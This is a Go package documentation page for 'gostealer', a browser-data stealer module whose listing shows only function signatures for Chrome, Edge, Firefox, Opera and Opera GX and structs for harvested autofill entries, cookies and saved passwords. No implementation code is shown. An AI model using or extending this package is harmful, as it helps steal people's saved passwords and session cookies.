Discover Packages
github.com/4kord/gostealer
browsers
package
Version:
v0.0.0-...-d3f3ab3
Opens a new window with list of versions in this module.
Published: Aug 20, 2022
License: MIT
Opens a new window with license information.
Imports: 12
Opens a new window with list of imports.
Imported by: 0
Opens a new window with list of known importers.
Documentation
Documentation
¶
func Chrome(browserPath, logFolderPath string )
func Edge(browserPath, logFolderPath string )
func Firefox(browserPath, logFolderPath string )
func Opera(browserPath, logFolderPath string )
func OperaGX(browserPath, logFolderPath string )
type AutofillEntry struct {
Name string `json:"name"`
Value string `json:"value"`
}
type CookieEntry struct {
Host string `json:"host"`
Path string `json:"path"`
Expiry int `json:"expiry"`
Name string `json:"name"`
Value string `json:"value"`
}
type PasswordEntry struct {
OriginUrl string `json:"origin_url"`
Username string `json:"username_value"`
Password string `json:"password"`
}
Source Files
¶
Click to show internal directories.
Click to hide internal directories.